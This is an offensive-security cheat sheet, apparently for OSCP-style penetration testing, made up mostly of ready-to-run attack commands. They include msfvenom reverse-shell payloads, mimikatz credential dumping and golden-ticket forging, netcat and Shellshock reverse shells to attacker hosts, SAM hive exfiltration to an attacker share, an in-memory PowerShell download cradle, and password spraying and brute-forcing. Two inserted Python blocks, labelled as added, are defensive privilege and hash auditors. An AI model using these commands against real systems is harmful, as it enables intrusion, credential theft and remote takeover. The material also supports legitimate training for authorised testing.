ATTACK TOOLS

…tools and uses vary
…take a look at the use of each before attempting

PAYLOAD CREATION
msfvenom
shellter

PASSWORD CRACKING
cewl (create word lists)
hashcat
john the ripper
LaZagne (pw dump)

EXPLOIT SEARCH
searchsploit
metasploit

PRIVILEGE IMPERSONATION
JuicyPotato
mimikatz
sam dump (hklm\sam)

PRIVESC TOOLS
UPnP
PSexec
PowerUp.ps1
Kerberoast
Windows-Privesc-Check2
fgdump.exe

COMPILER
gcc
i686-w64-mingw32-gcc

PASSWORD SPRAYING
crackmapexec

SQL EXPLOITATION
sqlmap

BRUTE FORCE
crackmapexec
hydra
medusa
wpscan
ncrack

WEB
dirb
dirbuster
curl
gobuster
nikto
hydra
wpscan
burpsuite
whatweb
google bot (change agent)
dig

PROTOCOL ENUMERATION
SNMP
showmount (NFS)
rpcinfo (RPC)
impacket-rpcdump
nmap scripting engine (NSE)
impacket-lookupsid
enum4linux
dig (LDAP)
impacket-GetNPUsers (LDAP)
smbmap (SMB)
nbtscan
SMTP

REMOTE INFORMATION
rpcinfo
example bash scripts

CONNECTIONS
ssh
smb
netcat (nc)
socat
sqsh (SQL)
mysql (SQL)
ftp
impacket-smbserver
pth-winexe (kerberos)
crackmapexec
rpcclient
rdesktop
xfreerdp
evil-winrm (WINRM)
proxychains (pivoting)
smbclient
pwsh (internal power shell)
netstat (to verify connections)

WEBSITES TO REFERENCE
GTFO Bins – great for priv esc
TTY Spawn – fix yer shell
Reverse Shells – common commands
Reverse Shells – another great source
Hash Examples – listed for hashcat
WhiteWinterWolf Web Shell – useful for web uploads

MSFVENOM

…used to create payloads of all sorts
…these examples are only the common uses

# ASP NET
msfvenom -p windows/shell/reverse_tcp LHOST=192.168.119.188 LPORT=443 -f asp > shell2.asp
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.119.188 LPORT=443 -f asp > rev.asp
# JAVA
msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.119.188 LPORT=80 -f raw > reverse.jsp
# WORDPRESS AND OTHER WEBS
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.11.0.4 LPORT=443 -f elf > shell.elf
msfvenom -p java/shell_reverse_tcp LHOST=192.168.119.188 LPORT=80 -f war -o tomcat.war
# MICROSOFT WORD
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.119.188 LPORT=80 -f hta-psh -o msfvevil.hta
# TRUNCATE VIA PYTHON TO 50 CHARACTERS PER LINE
# PRIV ESC BINARIES
msfvenom -a x64 --platform Windows -p windows/shell_reverse_tcp LHOST=192.168.119.188 LPORT=80 -f exe -o reverse_3333.exe
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.119.188 LPORT=80 -f exe -o reverse_80.exe
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.119.188 LPORT=80 -f exe > shellpingit.exe
# ETERNAL BLUE
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.32 LPORT=443 EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f py -v shellcode -a x86
# LINUX BINARY CREATION
msfvenom -p linux/x86/exec CMD=/bin/sh -f elf -o scp
# PLACE FILE ON TARGET IN /tmp
# PERMISSIONS: chmod file to 755
# RUN ROOT BINARY REFERENCING scp
# WINDOWS MALICIOUS INSTALL FILE
# CHECK REGISTRY FOR ALWAYS PRIV'D INSTALLS (will work, or give error)
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
# CREATE MALICIOUS BINARIES/DLL
msfvenom -p windows/shell_reverse_tcp -e x86/shikata_ga_nai LHOST=10.10.10.299 LPORT=80 -f exe -o payload.exe
msfvenom -p windows/exec cmd="C:\tmp\Payload.exe" -f msi-nouac -o shell.msi
# ON WINDOWS
msiexec /quiet /qn /i "C:\tmp\shell.msi"
# OR CREATE DLL DIRECTLY
msfvenom -p windows/shell_reverse_tcp lhost=10.10.10.299 lport=80 -f dll -o shell.dll
# ON WINDOWS - COPY TO VALID WRITEABLE LOCATION
copy shell.dll C:\Python27\wlbsctrl.dll

SHELLTER

… antivirus evasion and binary creation
… GUI for creating binaries

shellter

CEWL

… custom word list generator

cewl http://website.com -w wordlist.txt
# SPECIFY CHARACTER LENGTH
cewl http://website.com -m 7
# FIND EMAILS ON WEBPAGE
cewl https://website.com/ -n -e
# COUNT TIMES THAT A WORD APPEARS
cewl https://website.com/ -c
# SPECIFY DEPTH
cewl https://website.com/ -d 2
# EXAMPLE
cewl -d 2 -m 5 -w wordlist.txt https://website.com/

HASHCAT

…a common technique is identifying the hash type before cracking
…then attempt to find the useful module for that type
…then crack the hash (rockyou.txt may need to be unzipped by default)

hashid file.hash
hashcat -h | grep <type_hash>
hashcat -m 0 file.hash /usr/share/wordlists/rockyou.txt

JOHN THE RIPPER

… password cracker
… uses CPU rather than GPU and can be slower than hashcat

john file.hash
# SHOW RESULTS
john --show file.hash
# USE WORDLIST
john file.hash --wordlist=/usr/share/wordlists/rockyou.txt
# REPORT PROGRESS EVERY 3 SECONDS
--progress-every=3
# SPECIFY FORMAT
--format=krb5tgs

LAZAGNE PASSWORD DUMP

… this will dump NTLM hashes to crack with hashcat or john
… use the second half of the hash with hashcat -m 1000 (NTLM)

.\lazagne_pw_dump.exe all
# OUTPUT
Administrator:500:aad3b435beeeeeeed3b435b51404ee:6b0e72ee64ea42ca092beeeeeeefa46e:::
Guest:501:aad3b435eeeeeeeaad3b435b51404ee:31d6cfeeeeeeee31b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51eeeeeee3b435b51404ee:31d6ceeeeeeee931b73c59d7e0c089c0:::
SupportAccount:504:aad3b435b51404eeeeeee435b51404ee:3b458b0b1294c03efeeeeeeef381498:::
name:1001:aad3b435b5eeeeeeee3b435b51404ee:b40c7060e1beeeeeee1564a1bf33d48:::
# HASHCAT USING 'name'
echo "b40c7060e1beeeeeee1564a1bf33d48" > secondhalf.hash
hashcat -m 1000 secondhalf.hash /usr/share/wordlists/rockyou.txt
# HASHCAT OUTPUT
Session..........: hashcat
Filename..: /usr/share/wordlists/rockyou.txt
Status...........: Cracked
Hash.Mode........: 1000 (NTLM)
b40c7060e1beeeeeee1564a1bf33d48:password

SEARCHSPLOIT

…a database of all exploits is kept on kali
…these can be accessed through the searchsploit tool
…use the name and version of the target software for your search

# STANDARD SEARCH (PROBABLY TONS OF RESULTS)
searchsploit software
# REFINE SEARCH WITH VERSION NUMBER
searchsploit software version 1.2.3
# VIEW AND USE EXPLOITS
searchsploit -x exploit
searchsploit -m exploit
# EXAMPLE
searchsploit tomcat
------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                           |  Path
------------------------------------------------------------------------- ---------------------------------
4D WebSTAR 5.3/5.4 Tomcat Plugin - Remote Buffer Overflow                | osx/remote/25626.c
Apache 1.3.x + Tomcat 4.0.x/4.1.x mod_jk - Chunked Encoding Denial of Se | unix/dos/22068.pl
Apache Commons FileUpload and Apache Tomcat - Denial of Service          | multiple/dos/31615.rb
# Grab or view the exploit (example from first entry)
searchsploit -m osx/remote/25626.c

METASPLOIT

…NOTE:  not to be used on the OSCP exam
…this is an automated framework for exploits and shells

sudo msfconsole -q -x "use exploit/multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set AutoRunScript post/windows/manage/migrate; set LHOST 10.10.1.299; set LPORT 80; run"

JUICY POTATO

… test script found here 
… list of CLSIDs found here

whoami /all

PRIVILEGES INFORMATION
----------------------------------------------------------------------------------------
SeImpersonatePrivilege   Impersonate a client after authentication   Enabled
----------------------------------------------------------------------------------------

JUICY POTATO - WIN 7/8.1/10/SV2008/SV2012/SV2016
# THE nc PORT NEEDS TO MATCH THE jp -l PORT
# always test connection first...
C:\wamp\www\PHP\upload2\fileManager\users\U1\nc.exe 192.168.119.299 3000 -e C:\Windows\System32\cmd.exe
# CAN PUT ALL OF THE RESULTS IN A BATCH FILE AND RUN THAT BATCH
echo <netcat command> > rev3000.bat
# JuicyPotato command (absolute path)
jp -l 3000 -p C:\wamp\www\PHP\upload2\fileManager\users\U1\rev3000.bat -t * -c {4991d34b-80a1-4291-83b6-3328366b9097}
# JuicyPotato command (relative path)
jp -l 3000 -p rev3000.bat -t * -c {03ca98d6-ff5d-49b8-abc6-03dd84127020}
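A defender's counterpart to the privilege check above, added here as an example (it is not code from the original page): a Python parser for the table that `whoami /priv` prints (the same PRIVILEGES INFORMATION table that `whoami /all` shows) which reports the high-risk privileges a token holds, so a service account can be stripped of them through User Rights Assignment before an impersonation-based escalation is possible. The sample output and the privilege list are my own; the list is drawn from Microsoft's user-rights documentation and SeImpersonatePrivilege is the one the JuicyPotato section relies on.

```python
import re

# Privileges that effectively grant local administrative control when held by a
# service or low-privilege account (all documented in Microsoft's user rights
# assignment guidance; the list here is an assumption of this example, not the page's).
HIGH_RISK_PRIVILEGES = {
    "SeImpersonatePrivilege": "impersonate authenticated clients, including SYSTEM",
    "SeAssignPrimaryTokenPrivilege": "assign a primary token to a new process",
    "SeDebugPrivilege": "open any process, including protected system processes",
    "SeBackupPrivilege": "read any file regardless of its ACL",
    "SeRestorePrivilege": "write any file regardless of its ACL",
    "SeTakeOwnershipPrivilege": "take ownership of any securable object",
    "SeLoadDriverPrivilege": "load kernel drivers",
}

# One data row of the table: name, free-text description, then Enabled/Disabled.
PRIV_LINE_RE = re.compile(r"^(Se\w+Privilege)\s+(.*?)\s+(Enabled|Disabled)\s*$")

# Constructed `whoami /priv` output for a web-server service account (not real).
SAMPLE_WHOAMI_PRIV = """\
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
"""


def parse_privileges(text):
    """Return {privilege_name: state} from `whoami /priv` or the privileges
    section of `whoami /all`; header and rule lines do not match and are skipped."""
    privs = {}
    for line in text.splitlines():
        m = PRIV_LINE_RE.match(line.rstrip())
        if m:
            privs[m.group(1)] = m.group(3)
    return privs


def high_risk_privileges(text):
    """Return {privilege: state} for every high-risk privilege the token holds.
    Disabled privileges are still reported: 'Disabled' only means not currently
    enabled in the token, and the process itself can switch it on."""
    return {p: s for p, s in parse_privileges(text).items() if p in HIGH_RISK_PRIVILEGES}


if __name__ == "__main__":
    for priv, state in high_risk_privileges(SAMPLE_WHOAMI_PRIV).items():
        print(f"{priv} ({state}): can {HIGH_RISK_PRIVILEGES[priv]}")
```

Run it against saved `whoami /priv` output from each service account on a host; anything it reports for an account that only serves web requests is a candidate for removal in the local security policy.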

MIMIKATZ

… Windows cache dumper from memory

# RUN FIRST
privilege::debug
# ENABLE LOGS TO REFER BACK
log nameoflog.log
# FIRST COMMAND TO DUMP PASSWORDS/HASHES
sekurlsa::logonpasswords
# LISTING OF OTHER COMMANDS AVAILABLE
sekurlsa::logonPasswords full
sekurlsa::tickets /export
sekurlsa::pth /user:Administrateur /domain:winxp /ntlm:f193d757b4d487ab7e5a3743f038f713 /run:cmd
kerberos::list /export
kerberos::ptt c:\chocolate.kirbi
kerberos::golden /admin:administrateur /domain:chocolate.local /sid:S-1-5-21-130452501-2365100805-3685010670 /krbtgt:310b643c5316c8c3c70a10cfb17e2e31 /ticket:chocolate.kirbi
crypto::capi
crypto::cng
crypto::certificates /export
crypto::certificates /export /systemstore:CERT_SYSTEM_STORE_LOCAL_MACHINE
crypto::keys /export
crypto::keys /machine /export
vault::cred
vault::list
token::elevate
vault::cred
vault::list
lsadump::sam
lsadump::secrets
lsadump::cache
token::revert
lsadump::dcsync /user:domain\krbtgt /domain:thinc.local
sekurlsa::pth /user:Administrateur /domain:chocolate.local /ntlm:cc36cf7a8514893efccd332446158b1a
sekurlsa::pth /user:Administrateur /domain:chocolate.local /aes256:b7268361386090314acce8d9367e55f55865e7ef8e670fbe4262d6c94098a9e9
sekurlsa::pth /user:Administrateur /domain:chocolate.local /ntlm:cc36cf7a8514893efccd332446158b1a /aes256:b7268361386090314acce8d9367e55f55865e7ef8e670fbe4262d6c94098a9e9
sekurlsa::pth /user:Administrator /domain:WOSHUB /ntlm:{NTLM_hash} /run:cmd.exe
sekurlsa::ekeys
sekurlsa::dpapi
sekurlsa::minidump lsass.dmp
kerberos::ptt [email protected]
kerberos::ptt [email protected]
kerberos::golden /user:utilisateur /domain:chocolate.local /sid:S-1-5-21-130452501-2365100805-3685010670 /krbtgt:310b643c5316c8c3c70a10cfb17e2e31 /id:1107 /groups:513 /ticket:utilisateur.chocolate.kirbi
kerberos::golden /domain:chocolate.local /sid:S-1-5-21-130452501-2365100805-3685010670 /aes256:15540cac73e94028231ef86631bc47bd5c827847ade468d6f6f739eb00c68e42 /user:Administrateur /id:500 /groups:513,512,520,518,519 /ptt /startoffset:-10 /endin:600 /renewmax:10080
kerberos::golden /admin:Administrator /domain:CTU.DOMAIN /sid:S-1-1-12-123456789-1234567890-123456789 /krbtgt:deadbeefboobbabe003133700009999 /ticket:Administrator.kiribi
kerberos::tgt
kerberos::purge

SAM FILE DUMPS (WINDOWS)

… Windows keeps its credentials in the SAM file
… these can been exported and seen… then the hash can be cracked

reg save hklm\sam c:\tmp\sam
reg save hklm\system c:\tmp\system
# use file transfers to receive these (like SMB)
copy sam \\192.168.119.188\share
copy system \\192.168.119.188\share
# use samdump2 and list the two files
samdump2 system sam
alice::1004:aad[redacted]eaad3b435b51404ee:b74242f37e47[redacted]ebcac4ffe:::
# the revealed hash can now be cracked
# for hashcat, use the second part of the hash (after the : character)
hashcat -m 1000 alice3.hash /usr/share/wordlists/rockyou.txt
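The LaZagne and SAM dump sections above both produce pwdump-format records (`user:rid:lm_hash:nt_hash:::`) and then pick the NT field out by hand. Added here as an example, and not code from the page: a Python parser for that format that does the field split and, from a password-audit angle, flags accounts with a blank password (the NT hash of the empty string) and accounts for which an LM hash is still stored. The sample dump is constructed; the hashes on the `legacy` line are the well-known LM and NT hashes of the string "password".

```python
import re

# NT hash of the empty string: an account showing it has a blank password.
EMPTY_NT_HASH = "31d6cfe0d16ae931b73c59d7e0c089c0"
# Placeholder LM hash written when Windows stores no LM hash for the account.
EMPTY_LM_HASH = "aad3b435b51404eeaad3b435b51404ee"

# pwdump record: user:rid:lm_hash:nt_hash:::  (both hashes are 32 hex digits)
PWDUMP_RE = re.compile(
    r"^(?P<user>[^:]+):(?P<rid>\d+):(?P<lm>[0-9a-f]{32}):(?P<nt>[0-9a-f]{32}):::$",
    re.IGNORECASE,
)

# Constructed sample dump, not real credentials. "legacy" carries the well-known
# LM and NT hashes of the string "password", as a host that still stores LM
# hashes would produce; "Guest" has the empty-string NT hash.
SAMPLE_DUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:6b0e72ee64ea42ca092b0123456789ab:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
legacy:1002:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::
this line is not a pwdump record and is skipped
"""


def parse_pwdump(text):
    """Parse pwdump/samdump2/LaZagne-style output; lines that do not match are ignored."""
    records = []
    for line in text.splitlines():
        m = PWDUMP_RE.match(line.strip())
        if m:
            rec = m.groupdict()
            rec["rid"] = int(rec["rid"])
            rec["lm"] = rec["lm"].lower()
            rec["nt"] = rec["nt"].lower()
            records.append(rec)
    return records


def audit_dump(text):
    """Map each account to the weaknesses visible in its stored hashes."""
    findings = {}
    for rec in parse_pwdump(text):
        issues = []
        if rec["nt"] == EMPTY_NT_HASH:
            issues.append("empty_password")      # logon with no password at all
        if rec["lm"] != EMPTY_LM_HASH:
            issues.append("lm_hash_stored")      # NoLMHash policy is not enforced
        findings[rec["user"]] = issues
    return findings


def nt_hash_by_user(text):
    """The NT field (the 'second half' the sections above feed to hashcat -m 1000)
    per account, skipping blank-password accounts, which need no cracking at all."""
    return {r["user"]: r["nt"] for r in parse_pwdump(text) if r["nt"] != EMPTY_NT_HASH}


if __name__ == "__main__":
    for user, issues in audit_dump(SAMPLE_DUMP).items():
        print(f"{user:15} {', '.join(issues) or 'no finding'}")
```

The two findings map directly to controls: a blank NT hash on an enabled account means the account logs on with no password, and any stored LM hash means the "Do not store LAN Manager hash value" policy is not in force on that host.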

WINDOWS XP SPECIFIC
UPnP EXPLOIT

… if you find yourself on an XP system, this will likely work
this resource explains the hack

# DON'T FORGET TO UPLOAD NETCAT (nc.exe)
C:\Inetpub>sc config upnphost binpath= "C:\Inetpub\wwwroot\nc.exe 192.168.119.299 80 -e C:\WINDOWS\System32\cmd.exe"
C:\Inetpub>sc config upnphost obj= ".\LocalSystem" password= ""
C:\Inetpub>sc qc upnphost
C:\Inetpub>sc config SSDPSRV start= auto
C:\Inetpub>net start SSDPSRV
C:\Inetpub>net start upnphost
# WILL NEED TO BE READY TO GENERATE ANOTHER SHELL QUICKLY

PSEXEC

… this is a standard Windows binary issued by Microsoft
… in conjunction with other attacks, it allows for great privilege escalation
… reverse_80.exe was created using msfvenom

psexec.exe -i -accepteula -d -s c:\tmp\reverse_80.exe

POWERUP MODULE

… found here (only one example of many)

c:\tmp> powershell -ExecutionPolicy Bypass
c:\tmp> import-module .\PowerUp.ps1
c:\tmp> Invoke-AllChecks
# DOWNLOAD AND USE
C:\tmp> powershell.exe Invoke-WebRequest -Uri "http://192.168.1.299:443/PowerUp.ps1" -OutFile "C:\tmp\pu.ps1"
C:\tmp> powershell.exe import-module C:\tmp\pu.ps1
# RUN REMOTELY (IN MEMORY)
powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://192.168.1.299:443/PowerUp.ps1'); Invoke-AllChecks"
# POSSIBLE OTHER COMMAND FOR EXEC BYPASS
powershell.exe -nop -exec bypass

KERBEROAST

… found here 

c:\tmp> powershell -ExecutionPolicy Bypass
PS C:\tmp> Import-Module .\Invoke-Kerberoast.ps1
PS C:\tmp> Invoke-Kerberoast -OutputFormat Hashcat | fl
# USE HASHCAT TO CRACK
# ELIMINATE ALL LINE BREAKS FROM THE OUTPUT
hashcat -m 13100 <hash_file> /usr/share/wordlists/rockyou.txt

FGDUMP

… found here 

.\fgdump.exe
# THREE FILES WILL BE CREATED
127.0.0.1.pwdump
2022-04-26-17-23-28.failed
2022-04-26-17-23-28.fgdump-log
# VIEW FILE FOR RESULTS
type 127.0.0.1.pwdump

WINDOWS-PRIVESC-CHECK (v2)

… found here 

.\wpc2.exe --audit -a -o report-%COMPUTERNAME%
# THREE FILES WILL BE CREATED
report-name.html
report-name.txt
report-name.xml
# OPEN THE HTML IN YOUR FAVORITE BROWSER
# THIS WILL SHOW SEVERITY OF EACH FOUND ITEM

GCC
I686-W64-MINGW32-GCC

…the extension of the exploit will reveal the programming language
…compilations are based on the language
…an example for “C” language is:

i686-w64-mingw32-gcc 25626.c -o pwned.exe
# flags may be used for different systems
# -m32 is used for 32-bit systems
# -Wall is another common flag that may work (avoids easy errors)
# OTHER EXAMPLES AS SEEN
gcc exp.c -o exp -lrt

CRACKMAPEXEC

… this is fantastic for “spray and pray” password scanning
… often used with credentials that are already found to test other systems

crackmapexec smb 10.10.1.299
crackmapexec smb 10.10.1.299 -u users.txt -p password.txt --continue-on-success >> cme_spray_10.10.1.299.txt
crackmapexec smb 10.10.1.299 -u username.txt -p password.txt --continue-on-success >> sprayoutput24.txt
crackmapexec winrm 10.10.1.299 -d user -u Administrator -p /usr/share/wordlists/rockyou.txt

SQLMAP

…NOTE… this is not usable on an OSCP exam

http://ip.com/whatever.php?id=1
# INTERCEPT WITH BURP - NO FORWARD
# RIGHT CLICK AND HIT 'SAVE ITEM'
# USE SQLMAP WITH SAVED ITEM
sqlmap -r <file> --banner   # takes a while to run
sqlmap -r <file> --users
sqlmap -r <file> --is-dba
sqlmap -r <file> --dbs
sqlmap -r <file> -D <db> --tables --threads=10
sqlmap -r <file> -D <db> -T <table> --columns --threads=10
sqlmap -r <file> -D <db> -T <table> --columns --hex --threads=10   # sometimes it shows more
sqlmap -r <file> -D <db> -T <table> --columns --dump --threads=10
sqlmap -r <file> -D <db> -T <table> --columns --dump --force-pivoting --threads=10
# RUN FOR ALL TABLES AND COLUMNS
sqlmap -r <file> -D ecomerce -T user --columns --dump --force-pivoting --threads=10
# TRY A SYSTEM SHELL
sqlmap -r mssql --os-shell --threads 10
os-shell> whoami

HYDRA

… login brute-forcer that supports tons of protocols
… supports the following:
Cisco AAA, Cisco auth, Cisco enable, CVS, FTP, HTTP(S)-FORM-GET, HTTP(S)-FORM-POST, HTTP(S)-GET, HTTP(S)-HEAD, HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MS-SQL, MySQL, NNTP, Oracle Listener, Oracle SID, PC-Anywhere, PC-NFS, POP3, PostgreSQL, RDP, Rexec, Rlogin, Rsh, SIP, SMB(NT), SMTP, SMTP Enum, SNMP v1+v2+v3, SOCKS5, SSH (v1 and v2), SSHKEY, Subversion, Teamspeak (TS2), Telnet, VMware-Auth, VNC and XMPP

# USAGE
hydra -l <username> -P <password list> <Target hostname> <service module> <post request parameters>
# EXPLANATION
{page URL}:{Request post body form parameters}:S={Find whatever in the page after successfully logged in}
# EXAMPLE
hydra -l admin -P /usr/share/wordlists/rockyou.txt testasp.vulnweb.com http-post-form "/Login.asp?RetURL=%2FDefault%2Easp%3F:tfUName=^USER^&tfUPass=^PASS^:S=logout" -vV -f
hydra -l user -P sitewordlist.txt 10.10.1.299 http-post-form "/department/login.php:username=admin&password=^PASS^:Invalid Password!"
hydra -l user -P rockyoubackwards.txt 10.10.1.229 -t 4 -vV ssh

MEDUSA

… login brute-forcer for remote protocols
… uses concurrent connection through thread-based parallel testing

# USAGE
medusa [-h host|-H file] [-u username|-U file] [-p password|-P file] [-C file] -M module [OPT]
# EXAMPLE
medusa -M ssh -H host.txt -U users.txt -p password
medusa -M ftp -s -h host -u username -p password
medusa -M mysql -h host -u user -p password
medusa -M smbnt -h somehost -C pwdump.txt -m PASS:HASH -m GROUP:DOMAIN
medusa -M mysql -h host -U users.txt -p <hash> -m PASS:HASH
medusa -M pop3 -m DOMAIN:foo.com -U accounts.txt -p password
medusa -M smtp-vrfy -m VERB:VRFY -U accounts.txt -p domain.com
medusa -M smtp -m EHLO:world -U accounts.txt -p password
medusa -h 10.11.1.31 -u admin -P rockyou.txt -M http -m DIR:/admin
# LIST WITH user:password (full.txt)
medusa -M smbnt -C full.txt -H hosts.txt
# SOME EXAMPLES USE A LIST OF USERS/ACCOUNTS

WPSCAN

… simple enumeration of a WordPress site (web)

# SCAN SIMPLE WEBSITE
wpscan --url http://website.com
# SCAN FOR PUBLIC VIEWABLE USERS (u = users)
wpscan --url http://website.com -e u
# TRY KNOWN PASSWORDS
wpscan --url http://website.com --passwords file/path/passwords.txt
# TRY WITH ADMIN USERNAME
wpscan --url http://10.10.1.229 --passwords /usr/share/wordlists/rockyou.txt --usernames admin
# POSSIBLE EXPLOIT THROUGH 404 PAGE
# CHANGE 404 PAGE - PANEL --> APPEARANCE --> EDITOR
# WordPress: Reverse Shell
curl http://10.10.1.299/wp-content/themes/twentytwelve/404.php

NCRACK

… network authentication and cracking

# USE DEFAULT LISTS
ncrack 192.168.1.299:21 -v
# USE A DEFINED LIST
ncrack -U path/of/usernamelist -P path/of/passwordlist <ip address or domain name>:port -v

DIRB

… web content scanner (directory finder)

# SIMPLE SCAN USING DEFAULT LISTS
dirb http://website.com/
# FOCUS ON A DIRECTORY
dirb http://website.com/directory/
# SPECIFIC EXTENSION SEARCH
-X .php   # EXAMPLE page.php
# SHOW ALL FOUND EXAMPLES OF PARAMETER
-H .php   # EXAMPLE php.ini
# SAVE OUTPUT TO A FILE
-o outputfile.txt
# IGNORE A CERTAIN CODE RETURN
-N 302
# TELL DIRB NOT TO AVOID WARNINGS
-w
# SLOW DOWN YOUR SEARCH IN CERTAIN ENVIRONMENTS
-z 100
# DO NOT SCAN RECURSIVELY
-r
# SHOW "NOT FOUND" PAGES
-v
# AVOID USING THE "/" FOR CERTAIN CASES
-t
# HTTP AUTHORIZATION ON SOME SITES
-u anyuser:anypass
# SCAN A DIFFERENT PORT (PROXY)
dirb http://website.com -p website.com:port

DIRBUSTER

… a Java GUI with multithread
… looks for directories and files
… just specify your wordlist and options and click START

# A DEFAULT WORDLIST DIRECTORY
/usr/share/dirbuster/wordlists/

CURL

… transfer data to or from a server
… supported protocols:
HTTP, FTP, IMAP, POP3, SCP, SFTP, SMTP, TFTP, TELNET, LDAP, FILE
… NOTE:  you can right click on a BurpSuite request to save as a curl command

curl http://website.com
curl http://sub.website.com -i   # Include Response Headers
-I   # Fetch headers only (HEAD)
-L   # Follow Redirects
# GRAB A FILE
curl ftp://ftp.website.com/file.jpeg
# SAVE FILE TO LOCAL COMPUTER
curl -o filename.zip ftp://ftp.website.com/file.zip
curl 10.10.0.299:443/shell.pl > shell.pl
# THE BIG "O" (-O) SAVES IT UNDER THE SAME FILENAME
curl -O ftp://ftp.website.com/file.zip
# RESUME AFTER INTERRUPTION
curl -C - -O ftp://ftp.website.com/file.zip
# USER AUTHENTICATION
curl -u user:password -O ftp://ftp.website.com/file.zip
# UPLOAD A FILE TO FTP SERVER
curl -u user:password -T file.zip ftp://ftp.website.com/
# USE CUSTOM REQUEST METHOD LIKE POST
curl -X POST https://website.com/
# SEND ADDITIONAL FIELDS
curl -d "user=user&pass=pass" -X POST https://website.com/login
# SPECIFY CONTENT TYPE
curl -d '{json}' -H 'Content-Type: application/json' https://website.com/login
curl --data "param1=value1" --data "param2=value2" https://website.com/resource.cgi
# EMPTY DATA
curl --data '' https://website.com/resource.cgi
curl -X POST https://website.com/resource.cgi
curl --request POST https://website.com/resource.cgi
# SEND COMPLETE FILE
curl --form "[email protected]" https://website.com/resource.cgi
# DISCOVERY TRICKS
curl 10.11.1.71 -s -L | grep -E "title|href" | sed -e 's/^[[:space:]]*//'
curl 10.11.1.71 -s -L | html2text -width '99' | uniq
# EXAMPLE TO SEE NETCAT HELP USING STDOUT (2>&1;)
curl -H "User-Agent: () { :; }; /bin/bash -c 'echo aaaa; nc -h 2>&1; echo zzzz;'" http://10.10.1.299/cgi-bin/admin.cgi -s | sed -n '/aaaa/{:a;n;/zzzz/b;p;ba}'
# EXAMPLE REVERSE SHELL USING STDOUT
curl -H "User-Agent: () { :; }; /bin/bash -c 'echo aaaa; bash -i >& /dev/tcp/10.10.0.299/443 0>&1; echo zzzz;'" http://10.10.1.299/cgi-bin/admin.cgi -s | sed -n '/aaaa/{:a;n;/zzzz/b;p;ba}'
# PASS AN ARGUMENT USING A SHELL
curl localhost:8080/start_page.php?page=cmd.php --data 'cmd=id'

GOBUSTER

… brute-force directories, files, and DNS
… great to find vhosts

gobuster [mode] [options]
gobuster dir -u https://website.com/
# USE A SPECIFIED WORDLIST
gobuster dir -u https://website.com/ -w /usr/share/wordlist/directories.txt
# SPECIFY FILE TYPES
gobuster dir -u https://website.com/ -w wordlist.txt -x php,html,htm
# WILDCARD
--wildcard
# PRINT URL WHEN EXTRACTING
gobuster dir -e -u http://website.com/ --wildcard
# HIDE STATUS CODE
-n --wildcard
# SET THREAD NUMBER
-t 100
# TIMEOUT PARAMETER
--timeout 5s
# ENUMERATE DIRECTORIES WITH SPECIFIC EXTENSIONS
-x .php
# FOLLOW REDIRECTS
-r
# USE AUTHORIZATION
-U user -P password
# OBTAIN SUB DOMAINS WHILE BRUTE-FORCING
-z
# PROXY
-p 'https://website.com:8080' -u 'http://website.com/'
# FULL COMMAND WITH CODE ELIMINATION
gobuster -u http://10.10.1.299/ -w /usr/share/seclists/Discovery/Web_Content/common.txt -s '200,204,301,302,307,403,500' -e
# USING A CGI LIST AFTER CGI DISCOVERY
gobuster -u http://10.10.1.299/ -w /usr/share/seclists/Discovery/Web_Content/cgis.txt -s '200,204,403,500' -e

NIKTO

… performs fast security/information checks
… web server and CGI scanner
… tries to find SQL injection, XSS, versions, subdomains, and more

nikto -h website.com   # DEFAULTS TO PORT 80
nikto -h https://website.com
# SCAN A LIST OF DOMAINS IN A FILE
nikto -h domains.txt
# EXPORT RESULTS TO FILE
-o nikto_output.txt
-o nikto_output.txt -Format csv

HYDRA

… login cracker supporting multiple protocols
… support list includes:
Cisco AAA, Cisco auth, Cisco enable, CVS, FTP, HTTP(S)-FORM-GET, HTTP(S)-FORM-POST, HTTP(S)-GET, HTTP(S)-HEAD, HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MS-SQL, MySQL, NNTP, Oracle Listener, Oracle SID, PC-Anywhere, PC-NFS, POP3, PostgreSQL, RDP, Rexec, Rlogin, Rsh, SIP, SMB(NT), SMTP, SMTP Enum, SNMP v1+v2+v3, SOCKS5, SSH (v1 and v2), SSHKEY, Subversion, Teamspeak (TS2), Telnet, VMware-Auth, VNC and XMPP

hydra -l <username> -P <password list> <Target hostname> <service module> <post request parameters>
hydra <Target_IP> ssh -l <username> -p <password> -s 22 -vV
hydra <Target_IP> ssh -l <username> -P <password_file> -s 22 -vV
hydra -l <username> -p <password> ftp://<Target_IP>
hydra -l <username> -p <password> telnet://<Target_IP>
hydra -l admin -P /usr/share/wordlists/rockyou.txt sub.website.com http-post-form "/Login.asp?RetURL=%2FDefault%2Easp%3F:tfUName=^USER^&tfUPass=^PASS^:S=logout" -vV -f
hydra -L user.txt -p 123 192.168.1.299 ftp
hydra -L user.txt -P pass.txt 192.168.1.299 ftp
hydra -l user -P /usr/share/wordlists/rockyou.txt ssh://10.10.1.299
# SAVE OUTPUT TO FILE
-o hydra_output.txt
# SPECIFY THE PORT
-s 8000
# MULTIPLE HOSTS
-M hosts.txt
# ADD PARAMETER TO FINISH HOSTS WHEN FOUND
-F

